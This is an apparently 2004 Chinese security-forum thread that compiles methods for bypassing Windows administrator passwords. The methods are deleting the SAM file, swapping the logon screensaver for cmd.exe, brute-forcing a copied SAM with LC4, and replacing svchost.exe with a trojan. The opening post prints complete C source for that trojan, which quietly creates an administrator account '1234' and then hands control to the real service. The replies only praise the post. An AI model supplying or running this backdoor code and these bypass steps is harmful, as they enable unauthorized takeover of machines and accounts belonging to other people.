|
 | 作者: wojiaokl1 [wojiaokl1]
 论坛用户 |
登录 |
| 我把网上收集到的密码恢复方法整理如下: (有的在SP4后无效,但方法思路不错,仍列出) 1. 删除%winnt\system32\config的sam文件 实践结果: ,删除后,administrator密码为空,删除前,建议备份sam文件. 2. 删除%Documents and Settings\Administrator\下的目录Cookies 实践结果: 打了SP4的机器,无效. 3. 修改%winnt\system32下的logo.scr,使用cmd.exe替换,让登录画面等待一段时间, 系统自动运行被我们替换的logo.scr,实际上运行的是cmd.exe,再用net user命令修改密码 或把管理员密码清空. 实际结果: 打了SP4的机器,无法成功,因为logo.scr是以guest身份运行 4. 替换系统的svhost.exe,实际执行的操作是调用net user命令来加用户或改密码 实践情况: 袁哥源程序要vc ++ 6.0编译,没装环境,还没试. 附源代码: #include <windows.h> #include <stdio.h> int main(int argc, char **argv) { int i; char buff[0x1000]; system("net.exe user 1234 1234 /add"); system("net.exe LOCALGROUP Administrators 1234 /add"); strcpy(buff,"svchost1.exe"); for(i=1;i<argc;++i){ strcat(buff," "); strcat(buff,argv[i]); } system(buff); } 按程序,如成功,用户1234密码1234将是管理员. 5. 网上有的专用清理工具ntpassword或cleanpwd. 实践情况: 有的是通过修改sam文件达到目的,感觉不是很安全,暂时没试. 6. 把%winnt\system32\config下的文件sam拷到另一台机器,用LC4来暴力破解. 实际结果: 密码不太复杂,好的机器,一两天能解开大过数的密码. |
| 地主 发表时间: 04-01-03 14:33 |
 | 回复: zkf [zkf] 论坛用户 |
登录 |
|
路过~~~ 顶一下 |
| B1层 发表时间: 04-01-03 14:35 |
 | 回复: boyan [boyan] 论坛用户 |
登录 |
|
我也是啊!~!~! |
| B2层 发表时间: 04-01-03 20:14 |
 | 回复: NightColor [nightcolor]  版主 |
登录 |
|
不错不错 虽然好象发的地方不对 还是置顶大家看看 |
| B3层 发表时间: 04-01-03 22:44 |
 | 回复: yimarong [yimarong] 版主 |
登录 |
|
不错! 有很多思路! |
| B4层 发表时间: 04-02-04 17:44 |
 | 回复: l_w_p [l_w_p]  论坛用户 |
登录 |
|
不错 |
| B5层 发表时间: 04-02-04 18:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 网吧专题 标题: 系统密码破解转载